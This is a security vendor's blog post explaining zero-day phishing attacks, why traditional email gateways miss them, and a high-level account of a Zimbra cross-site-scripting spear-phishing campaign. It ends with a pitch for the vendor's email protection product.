Advanced phishing

What is a zero-day phishing attack?

by Egress
Published on 17th Jan 2023

Zero-day vulnerabilities present a very real threat to cybersecurity. Exploiting a zero-day vulnerability as an attack vector is a complex process, but it allows attackers to slip into your system undetected and leave without a trace.

Once cybercriminals have gained access to your system, they can steal data quietly and sell it on the dark web, steal data and hold you to ransom over it, disable your systems and demand payment to give you back control or use your authentic email domain to phish other individuals and organizations within your supply chain.

Defining zero-day threats and vulnerabilities

Malicious actors and cybercriminals exploit zero-day vulnerabilities with cyberattacks, hoping to damage systems or steal data. A zero-day vulnerability refers to any unknown and unpatched security flaw in a system where attackers discover the issue before the software owner is aware. The presence of these unspecified vulnerabilities constitutes a zero-day threat.

One of the most common methods for zero-day attacks involves phishing or spear-phishing. According to our 2024 Email Security Risk Report, 94% of the organizations we surveyed had suffered from phishing attacks. In the latest report available from the FBI, the organization received 800,944 cybercrime complaints, which amounted to $10.3 billion in losses.

Why zero-day attacks are so dangerous

It's standard for cybercriminals to keep intelligence on zero-day vulnerabilities and reserve them for high-value target attacks. It's always the hits you don't see that cause the most damage. When attacks exploit vulnerabilities that are not yet known, software companies and vendors don't have time to fix the flaws.

What's worse is that once the attack does become known, there is usually a period before the vendors can develop a fix. This period can be an open season for copycat attacks while nervous customers wait for a priority patch.

Why traditional security technology is insufficient for zero-day attack prevention

Many people and organizations mistakenly believe that email is an inherently secure method for business communications. Much of this overconfidence stems from claims made by traditional security technology, but these tools fall short in preventing zero-day attacks. Employees at companies using secure email gateways can still end up with more advanced phishing attacks making it into their inboxes. At that point, all it takes is a single click to infect the entire network.

Secure email gateways rely on traditional methodologies to prevent attacks. They take samples from active, ongoing attacks to identify and shut down future threats. The problem is that modern phishing attacks are far more sophisticated than in the past, and attackers continually evolve their threats so quickly that traditional security measures can't keep up.

Another way secure email gateways recognize attacks is by observing high-volume spam patterns. Once again, attackers have adjusted and upped their game with low-volume targeted attacks that can bypass spam filters. These attackers use tried-and-true confidence tricks, like impersonating trusted individuals or vendors the employees know.

As fast as vendors can patch their systems, attackers adapt and develop new ways to exploit zero-day vulnerabilities. To stop phishing attacks from eroding trust, brand value, and company data security, organizations need to move past relying on traditional security tools and look to more intelligent email protection technologies.

Real-world case: Zimbra email theft

A series of spear-phishing campaigns recently targeted organizations in the European Government and media via a zero-day cross-site scripting vulnerability in the Zimbra email platform. The perpetrators constructed the attack with an elaborate reconnaissance campaign, and they sent emails with no malicious links to assess which recipients were most likely to open the follow-on communications.

These emails did not trigger internal security measures because they contained remote images, a standard tool used for analytics and metrics in marketing emails. The attackers made sure the image URLs were unique to each recipient, which allowed them to validate which email addresses were valid.

With a list of responsive leads, the attackers sent a series of malicious emails in four waves. Each email contained malicious links to attacker controller infrastructure, where they used a unique URL format that exploited a zero-day vulnerability to load JavaScript into the page. Users who clicked the link found that the attackers stole their entire email inbox.

So why didn't secure email gateways and spam filters detect and prevent this attack? Because the attack mirrored a common marketing business practice and therefore wasn't flagged.

Intelligent email protection with Egress Defend

Attackers run circles around traditional email security solutions by exploiting the most significant vulnerability in every system: human behavior. Today's sophisticated attacks apply the techniques of elaborate confidence scams to exploit technology endpoints and email to access vulnerable systems.

Egress Defend combines zero-trust models with advanced machine learning and natural language processing to detect and neutralize even the most sophisticated phishing attacks. Defend offers easy-to-deploy intelligent detection technologies that combine to defend against the most sophisticated phishing emails. Contextual, color-coded banners use nudge theory to reduce risk and augment security awareness and training.

Related articles